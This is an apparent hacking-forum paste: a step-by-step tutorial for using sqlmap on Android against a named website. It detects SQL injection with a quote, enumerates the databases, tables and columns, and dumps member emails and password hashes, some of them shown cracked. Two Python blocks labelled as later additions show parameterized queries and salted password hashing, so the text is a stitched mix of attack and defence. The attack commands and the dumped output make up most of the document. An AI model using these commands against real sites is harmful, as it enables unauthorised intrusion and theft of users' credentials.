KekSec

Freaks Android SQLMap Tutorial

Jul 26th, 2018
to check if a website is vulnerable, add a ' to the end of the URL
like this:
http://www.100safe.com/user.php?uid=46
becomes:
http://www.100safe.com/user.php?uid=46'
if the website is vulnerable you should see an error like this somewhere on the page:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
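Why the ' probe above makes the database throw that error, and what the fix looks like, as an added example that is not from the original paste: a stand-in for the user.php lookup using an in-memory SQLite database (constructed sample rows; the table and column names mirror the page's pb_members), with the query-string value spliced into the SQL beside a version that validates uid and binds it as a parameter.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the tutorial's user lookup (user.php?uid=46).
# Rows are made up; the table/column names mirror the page's pb_members table.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pb_members (uid INTEGER, username TEXT, email TEXT)")
    con.executemany("INSERT INTO pb_members VALUES (?, ?, ?)",
                    [(45, "alice", "alice@example.test"), (46, "bob", "bob@example.test")])
    return con

def lookup_vulnerable(con, uid):
    # The bug the ' test detects: the raw query-string value is spliced into the SQL
    # text, so a stray quote is parsed as SQL syntax and the DBMS reports a syntax error.
    sql = "SELECT username, email FROM pb_members WHERE uid = %s" % uid
    return con.execute(sql).fetchall()

def lookup_hardened(con, uid):
    # Fix, in two layers: reject anything that is not a decimal integer, then pass the
    # value as a bound parameter so the DBMS never sees it as part of the SQL text.
    if not isinstance(uid, str) or not re.fullmatch(r"[0-9]+", uid):
        raise ValueError("uid must be a decimal integer")
    return con.execute("SELECT username, email FROM pb_members WHERE uid = ?",
                       (int(uid),)).fetchall()

def probe(lookup, uid):
    """Run one lookup on a fresh database and report what a visitor would see:
    ('ok', rows) or ('error', message)."""
    try:
        return ("ok", lookup(make_db(), uid))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    for name, fn in (("vulnerable", lookup_vulnerable), ("hardened", lookup_hardened)):
        for uid in ("46", "46'"):
            print(name, repr(uid), probe(fn, uid))
```

The vulnerable lookup leaks a DBMS syntax error for `46'` (the signal the tutorial looks for), while the hardened one rejects the input before any SQL runs and returns the same row for a clean `46`.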

now we need to install and open termux.
first we need to install python 2 and unzip. type:

pkg install python2 unzip

download the latest sqlmap zip package from sqlmap.org

next run these three commands:
cd /sdcard/Download/
unzip sqlmap*.zip
cd sqlmap*

now we get started!

next we are going to list the databases on the target website. enter this command:
python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 --dbs
if you get this it almost always means the site can be hacked:
[10:57:59] [INFO] heuristic (basic) test shows that GET parameter 'uid' might be injectable (possible DBMS: 'MySQL')
[10:58:00] [INFO] heuristic (XSS) test shows that GET parameter 'uid' might be vulnerable to cross-site scripting (XSS) attacks
[10:58:00] [INFO] testing for SQL injection on GET parameter 'uid'
once it says this:
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

type Y then press enter

next you will get this

for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n]

type Y then press enter

once it's done doing tests and finds a working injection method you will see output that should look like this:

[10:05:15] [INFO] fetching database names
[10:05:15] [INFO] used SQL query returns 8 entries
[10:05:15] [INFO] resumed: information_schema
[10:05:15] [INFO] resumed: 100safe
[10:05:15] [INFO] resumed: Iloveyou
[10:05:15] [INFO] resumed: hypocket_api
[10:05:15] [INFO] resumed: mysql
[10:05:15] [INFO] resumed: now
[10:05:15] [INFO] resumed: performance_schema
[10:05:15] [INFO] resumed: superpay_api
available databases [8]:
[*] 100safe
[*] hypocket_api
[*] Iloveyou
[*] information_schema
[*] mysql
[*] now
[*] performance_schema
[*] superpay_api

^ those are the databases on the vulnerable server.

to list the tables in a database use this command:
python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe --tables

the output should look like this:
[10:07:32] [INFO] fetching tables for database: '100safe'
[10:07:32] [INFO] used SQL query returns 39 entries
Database: 100safe
[39 tables]
+------------------+
| pb_admingroups |
| pb_adminlogs |
| pb_adminonlines |
| pb_announcements |
| pb_applyinvite |
| pb_attachments |
| pb_categories |
| pb_cdata |
| pb_comments |
| pb_commonlogs |
| pb_configs |
| pb_friends |
| pb_fsession |
| pb_guestmsg |
| pb_invitecode |
| pb_links |
| pb_memberdata |
| pb_memberexp |
| pb_members |
| pb_message |
| pb_onlines |
| pb_plugins |
| pb_regions |
| pb_scaches |
| pb_sitestat |
| pb_special |
| pb_splink |
| pb_tagcache |
| pb_tags |
| pb_tdata |
| pb_templates |
| pb_threads |
| pb_threads_home |
| pb_threads_tmp |
| pb_tinfo |
| pb_tinfo_home |
| pb_tinfo_tmp |
| pb_tplvar |
| pb_usergroups |
+------------------+

^ those are the tables in the database "100safe"

obviously we want to dump (download or read) the table pb_members, because it likely contains the users' passwords.
first we have to list the columns in the table. type in this command:
python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe -T pb_members --columns
the columns should look similar to this for most user tables:

[10:25:43] [INFO] fetching columns for table 'pb_members' in database '100safe'
[10:25:43] [INFO] used SQL query returns 9 entries
[10:25:43] [INFO] resumed: uid
[10:25:43] [INFO] resumed: mediumint(8) unsigned
[10:25:43] [INFO] resumed: username
[10:25:43] [INFO] resumed: varchar(20)
[10:25:43] [INFO] resumed: password
[10:25:43] [INFO] resumed: char(32)
[10:25:43] [INFO] resumed: email
[10:25:43] [INFO] resumed: varchar(100)
[10:25:43] [INFO] resumed: adminid
[10:25:43] [INFO] resumed: tinyint(3)
[10:25:43] [INFO] resumed: groupid
[10:25:43] [INFO] resumed: tinyint(3)
[10:25:43] [INFO] resumed: publicemail
[10:25:43] [INFO] resumed: tinyint(1)
[10:25:43] [INFO] resumed: regip
[10:25:43] [INFO] resumed: char(15)
[10:25:43] [INFO] resumed: regdate
[10:25:43] [INFO] resumed: int(10) unsigned
Database: 100safe
Table: pb_members
[9 columns]
+-------------+-----------------------+
| Column      | Type                  |
+-------------+-----------------------+
| adminid     | tinyint(3)            |
| email       | varchar(100)          |
| groupid     | tinyint(3)            |
| password    | char(32)              |
| publicemail | tinyint(1)            |
| regdate     | int(10) unsigned      |
| regip       | char(15)              |
| uid         | mediumint(8) unsigned |
| username    | varchar(20)           |
+-------------+-----------------------+

now we will extract all the entries in the columns email and password from the database:
python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe -T pb_members -C email,password --dump

sadly the passwords on this site are hashed with MD5, but we were able to crack a couple.
by the way, sometimes on other websites the passwords are all plaintext! (not hashed at all!)
here is the output, with what you should type at the prompts already filled in so you know what to do.

[10:30:15] [INFO] fetching entries of column(s) 'email, password' for table 'pb_members' in database '100safe'
[10:30:15] [INFO] used SQL query returns 790 entries
[10:30:15] [WARNING] reflective value(s) found and filtering out

[10:30:20] [WARNING] user aborted during enumeration. sqlmap will display partial output
[10:30:20] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[10:30:31] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\New Owner\Desktop\Cracking\sqlmapproject-sqlmap-5e2d0bd\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[10:30:35] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[10:30:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[10:30:38] [INFO] starting 2 processes
[10:30:44] [INFO] cracked password '19850110' for hash 'dd3cda213b3da62490992d6a5e181874'
[10:30:45] [INFO] cracked password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e'
Database: 100safe
Table: pb_members
[27 entries]

[10:32:32] [INFO] table '`100safe`.pb_members' dumped to CSV file 'C:\Users\New Owner\.sqlmap\output\www.100safe.com\dump\100safe\pb_members.csv'

you can speed up the dump by adding the option --threads=10 to the end of the dump command.

and ya, that's basically it! that's pretty much all you need to know about sqlmap!!! happy hacking mister 1337
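On the MD5 point above: an added example (mine, not from the paste or from sqlmap) showing why an unsalted MD5 column is cracked in bulk by one wordlist pass, and what a salted, deliberately slow password store looks like using only Python's standard library. Sample passwords are constructed; the MD5 value checked is the one the page shows being cracked to '123456'.

```python
import hashlib
import hmac
import os

def md5_store(password):
    # What the dumped site did: a single unsalted MD5. The same password always maps to
    # the same 32-hex-char value, so one wordlist pass recovers it for every user at once,
    # and any two users who share a password are visibly identical in the dump.
    return hashlib.md5(password.encode("utf-8")).hexdigest()

def pbkdf2_store(password, salt=None, iterations=600_000):
    # Salted, slow hash (PBKDF2-HMAC-SHA256). A fresh random salt per user means equal
    # passwords produce different records, and every guess costs 600k iterations rather
    # than one MD5 call, so a dictionary step cannot be amortised across the whole table.
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())

def pbkdf2_verify(password, record):
    # Recompute with the salt and iteration count stored in the record; compare in
    # constant time so timing does not leak how many leading bytes matched.
    algo, iterations, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

def same_password_same_record(store, password):
    # True when two users choosing the same password end up with identical stored
    # values, i.e. when the store leaks password equality and is crackable in bulk.
    return store(password) == store(password)

if __name__ == "__main__":
    print(md5_store("123456"))                                # the hash cracked on the page
    print(same_password_same_record(md5_store, "123456"))     # True: unsalted
    print(same_password_same_record(pbkdf2_store, "123456"))  # False: per-user salt
    rec = pbkdf2_store("123456")
    print(pbkdf2_verify("123456", rec), pbkdf2_verify("123457", rec))
```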